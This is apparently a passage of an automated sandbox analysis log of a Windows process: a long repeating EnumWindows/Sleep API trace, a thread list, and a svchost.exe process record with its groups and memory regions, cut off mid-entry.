[0293.750] Sleep (dwMilliseconds=0x64) [0293.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.775] Sleep (dwMilliseconds=0x64) [0293.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.788] Sleep (dwMilliseconds=0x64) [0293.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.839] Sleep (dwMilliseconds=0x64) [0293.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.882] Sleep (dwMilliseconds=0x64) [0293.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.884] Sleep (dwMilliseconds=0x64) [0293.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.924] Sleep (dwMilliseconds=0x64) [0293.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.961] Sleep (dwMilliseconds=0x64) [0293.969] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0293.969] Sleep (dwMilliseconds=0x64) [0293.997] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.002] Sleep (dwMilliseconds=0x64) [0294.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.040] Sleep (dwMilliseconds=0x64) [0294.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.143] Sleep (dwMilliseconds=0x64) [0294.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.161] Sleep (dwMilliseconds=0x64) [0294.198] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.198] Sleep (dwMilliseconds=0x64) [0294.227] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.228] Sleep (dwMilliseconds=0x64) [0294.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.239] Sleep (dwMilliseconds=0x64) [0294.309] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.309] Sleep (dwMilliseconds=0x64) [0294.313] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.314] Sleep (dwMilliseconds=0x64) [0294.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.359] Sleep (dwMilliseconds=0x64) [0294.397] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.398] Sleep (dwMilliseconds=0x64) [0294.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.407] Sleep (dwMilliseconds=0x64) [0294.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.436] Sleep (dwMilliseconds=0x64) [0294.474] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.475] Sleep (dwMilliseconds=0x64) [0294.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.496] Sleep (dwMilliseconds=0x64) [0294.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.514] Sleep (dwMilliseconds=0x64) [0294.554] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.555] Sleep (dwMilliseconds=0x64) [0294.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.622] Sleep (dwMilliseconds=0x64) [0294.668] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.670] Sleep (dwMilliseconds=0x64) [0294.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.709] Sleep (dwMilliseconds=0x64) [0294.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.746] Sleep (dwMilliseconds=0x64) [0294.755] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.755] Sleep (dwMilliseconds=0x64) [0294.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.783] Sleep (dwMilliseconds=0x64) [0294.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.820] Sleep (dwMilliseconds=0x64) [0294.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.887] Sleep (dwMilliseconds=0x64) [0294.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.906] Sleep (dwMilliseconds=0x64) [0294.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.945] Sleep (dwMilliseconds=0x64) [0294.977] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.977] Sleep (dwMilliseconds=0x64) [0294.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0294.983] Sleep (dwMilliseconds=0x64) [0295.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.019] Sleep (dwMilliseconds=0x64) [0295.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.055] Sleep (dwMilliseconds=0x64) [0295.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.058] Sleep (dwMilliseconds=0x64) [0295.091] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.092] Sleep (dwMilliseconds=0x64) [0295.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.128] Sleep (dwMilliseconds=0x64) [0295.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.141] Sleep (dwMilliseconds=0x64) [0295.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.165] Sleep (dwMilliseconds=0x64) [0295.202] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.203] Sleep (dwMilliseconds=0x64) [0295.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.223] Sleep (dwMilliseconds=0x64) [0295.416] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.424] Sleep (dwMilliseconds=0x64) [0295.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.467] Sleep (dwMilliseconds=0x64) [0295.501] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.502] Sleep (dwMilliseconds=0x64) [0295.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.510] Sleep (dwMilliseconds=0x64) [0295.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.550] Sleep (dwMilliseconds=0x64) [0295.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.593] Sleep (dwMilliseconds=0x64) [0295.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.608] Sleep (dwMilliseconds=0x64) [0295.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.639] Sleep (dwMilliseconds=0x64) [0295.692] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.693] Sleep (dwMilliseconds=0x64) [0295.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.718] Sleep (dwMilliseconds=0x64) [0295.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.757] Sleep (dwMilliseconds=0x64) [0295.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.787] Sleep (dwMilliseconds=0x64) [0295.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.798] Sleep (dwMilliseconds=0x64) [0295.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.874] Sleep (dwMilliseconds=0x64) [0295.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.912] Sleep (dwMilliseconds=0x64) [0295.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.915] Sleep (dwMilliseconds=0x64) [0295.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.953] Sleep (dwMilliseconds=0x64) [0295.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.989] Sleep (dwMilliseconds=0x64) [0295.999] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0295.999] Sleep (dwMilliseconds=0x64) [0296.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.026] Sleep (dwMilliseconds=0x64) [0296.063] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.063] Sleep (dwMilliseconds=0x64) [0296.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.084] Sleep (dwMilliseconds=0x64) [0296.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.101] Sleep (dwMilliseconds=0x64) [0296.136] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.137] Sleep (dwMilliseconds=0x64) [0296.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.170] Sleep (dwMilliseconds=0x64) [0296.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.175] Sleep (dwMilliseconds=0x64) [0296.211] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.211] Sleep (dwMilliseconds=0x64) [0296.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.249] Sleep (dwMilliseconds=0x64) [0296.256] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.256] Sleep (dwMilliseconds=0x64) [0296.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.287] Sleep (dwMilliseconds=0x64) [0296.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.323] Sleep (dwMilliseconds=0x64) [0296.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.341] Sleep (dwMilliseconds=0x64) [0296.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.364] Sleep (dwMilliseconds=0x64) [0296.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.402] Sleep (dwMilliseconds=0x64) [0296.576] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.577] Sleep (dwMilliseconds=0x64) [0296.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.626] Sleep (dwMilliseconds=0x64) [0296.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.701] Sleep (dwMilliseconds=0x64) [0296.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.754] Sleep (dwMilliseconds=0x64) [0296.758] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.759] Sleep (dwMilliseconds=0x64) [0296.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.795] Sleep (dwMilliseconds=0x64) [0296.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.869] Sleep (dwMilliseconds=0x64) [0296.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.885] Sleep (dwMilliseconds=0x64) [0296.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.907] Sleep (dwMilliseconds=0x64) [0296.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.946] Sleep (dwMilliseconds=0x64) [0296.975] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.976] Sleep (dwMilliseconds=0x64) [0296.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0296.987] Sleep (dwMilliseconds=0x64) [0297.023] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.023] Sleep (dwMilliseconds=0x64) [0297.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.062] Sleep (dwMilliseconds=0x64) [0297.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.064] Sleep (dwMilliseconds=0x64) [0297.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.101] Sleep (dwMilliseconds=0x64) [0297.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.139] Sleep (dwMilliseconds=0x64) [0297.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.146] Sleep (dwMilliseconds=0x64) [0297.175] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.175] Sleep (dwMilliseconds=0x64) [0297.212] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.213] Sleep (dwMilliseconds=0x64) [0297.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.230] Sleep (dwMilliseconds=0x64) [0297.251] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.252] Sleep (dwMilliseconds=0x64) [0297.287] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.288] Sleep (dwMilliseconds=0x64) [0297.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.313] Sleep (dwMilliseconds=0x64) [0297.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.330] Sleep (dwMilliseconds=0x64) [0297.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.366] Sleep (dwMilliseconds=0x64) [0297.398] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.398] Sleep (dwMilliseconds=0x64) [0297.404] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.404] Sleep (dwMilliseconds=0x64) [0297.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.440] Sleep (dwMilliseconds=0x64) [0297.501] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.502] Sleep (dwMilliseconds=0x64) [0297.505] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.505] Sleep (dwMilliseconds=0x64) [0297.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.541] Sleep (dwMilliseconds=0x64) [0297.579] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.579] Sleep (dwMilliseconds=0x64) [0297.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.593] Sleep (dwMilliseconds=0x64) [0297.619] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.620] Sleep (dwMilliseconds=0x64) [0297.691] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.691] Sleep (dwMilliseconds=0x64) [0297.709] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.709] Sleep (dwMilliseconds=0x64) [0297.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.730] Sleep (dwMilliseconds=0x64) [0297.766] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.767] Sleep (dwMilliseconds=0x64) [0297.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.792] Sleep (dwMilliseconds=0x64) [0297.805] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.805] Sleep (dwMilliseconds=0x64) [0297.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.866] Sleep (dwMilliseconds=0x64) [0297.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.899] Sleep (dwMilliseconds=0x64) [0297.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.907] Sleep (dwMilliseconds=0x64) [0297.943] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.943] Sleep (dwMilliseconds=0x64) [0297.979] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.980] Sleep (dwMilliseconds=0x64) [0297.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0297.985] Sleep (dwMilliseconds=0x64) [0298.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.017] Sleep (dwMilliseconds=0x64) [0298.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.053] Sleep (dwMilliseconds=0x64) [0298.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.067] Sleep (dwMilliseconds=0x64) [0298.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.090] Sleep (dwMilliseconds=0x64) [0298.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.132] Sleep (dwMilliseconds=0x64) [0298.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.157] Sleep (dwMilliseconds=0x64) [0298.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.175] Sleep (dwMilliseconds=0x64) [0298.210] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.210] Sleep (dwMilliseconds=0x64) [0298.249] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.250] Sleep (dwMilliseconds=0x64) [0298.288] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.289] Sleep (dwMilliseconds=0x64) [0298.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.328] Sleep (dwMilliseconds=0x64) [0298.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.332] Sleep (dwMilliseconds=0x64) [0298.365] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.366] Sleep (dwMilliseconds=0x64) [0298.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.402] Sleep (dwMilliseconds=0x64) [0298.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.415] Sleep (dwMilliseconds=0x64) [0298.438] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.439] Sleep (dwMilliseconds=0x64) [0298.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.484] Sleep (dwMilliseconds=0x64) [0298.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.509] Sleep (dwMilliseconds=0x64) [0298.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.524] Sleep (dwMilliseconds=0x64) [0298.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.562] Sleep (dwMilliseconds=0x64) [0298.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.598] Sleep (dwMilliseconds=0x64) [0298.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.634] Sleep (dwMilliseconds=0x64) [0298.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.680] Sleep (dwMilliseconds=0x64) [0298.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.701] Sleep (dwMilliseconds=0x64) [0298.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.727] Sleep (dwMilliseconds=0x64) [0298.765] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.766] Sleep (dwMilliseconds=0x64) [0298.788] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.788] Sleep (dwMilliseconds=0x64) [0298.803] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.804] Sleep (dwMilliseconds=0x64) [0298.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.909] Sleep (dwMilliseconds=0x64) [0298.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.943] Sleep (dwMilliseconds=0x64) [0298.949] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.949] Sleep (dwMilliseconds=0x64) [0298.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0298.986] Sleep (dwMilliseconds=0x64) [0299.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.024] Sleep (dwMilliseconds=0x64) [0299.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.029] Sleep (dwMilliseconds=0x64) [0299.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.061] Sleep (dwMilliseconds=0x64) [0299.099] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.100] Sleep (dwMilliseconds=0x64) [0299.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.119] Sleep (dwMilliseconds=0x64) [0299.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.146] Sleep (dwMilliseconds=0x64) [0299.187] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.187] Sleep (dwMilliseconds=0x64) [0299.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.209] Sleep (dwMilliseconds=0x64) [0299.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.225] Sleep (dwMilliseconds=0x64) [0299.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.262] Sleep (dwMilliseconds=0x64) [0299.291] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.291] Sleep (dwMilliseconds=0x64) [0299.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.300] Sleep (dwMilliseconds=0x64) [0299.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.336] Sleep (dwMilliseconds=0x64) [0299.381] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.382] Sleep (dwMilliseconds=0x64) [0299.439] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.440] Sleep (dwMilliseconds=0x64) [0299.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.509] Sleep (dwMilliseconds=0x64) [0299.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.520] Sleep (dwMilliseconds=0x64) [0299.551] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.553] Sleep (dwMilliseconds=0x64) [0299.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.590] Sleep (dwMilliseconds=0x64) [0299.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.609] Sleep (dwMilliseconds=0x64) [0299.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.630] Sleep (dwMilliseconds=0x64) [0299.668] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.668] Sleep (dwMilliseconds=0x64) [0299.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.693] Sleep (dwMilliseconds=0x64) [0299.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.715] Sleep (dwMilliseconds=0x64) [0299.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.753] Sleep (dwMilliseconds=0x64) [0299.784] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.784] Sleep (dwMilliseconds=0x64) [0299.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.792] Sleep (dwMilliseconds=0x64) [0299.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.846] Sleep (dwMilliseconds=0x64) [0299.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.895] Sleep (dwMilliseconds=0x64) [0299.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0299.899] Sleep (dwMilliseconds=0x64) [0299.948] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0300.204] Sleep (dwMilliseconds=0x64) [0300.277] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0300.278] Sleep (dwMilliseconds=0x64) [0300.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0300.342] Sleep (dwMilliseconds=0x64) Thread: id = 61 os_tid = 0x1388 Thread: id = 156 os_tid = 0xd84 Thread: id = 158 os_tid = 0xd44 Thread: id = 162 os_tid = 0xfe4 Thread: id = 163 os_tid = 0x25c Thread: id = 218 os_tid = 0x7b0 Thread: id = 219 os_tid = 0xf88 Thread: id = 220 os_tid = 0xbdc Thread: id = 221 os_tid = 0xe0c Thread: id = 222 os_tid = 0x410 Thread: id = 223 os_tid = 0xa04 Thread: id = 231 os_tid = 0x33c Thread: id = 258 os_tid = 0xcd4 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7369f000" os_pid = "0x60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1659 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1660 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1661 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1662 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1663 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1664 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1665 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1666 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1667 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1668 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1669 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1670 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1671 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1672 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1673 start_va = 0x500000 end_va = 0x500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 1674 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1675 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1676 start_va = 0x530000 end_va = 0x531fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1677 start_va = 0x540000 end_va = 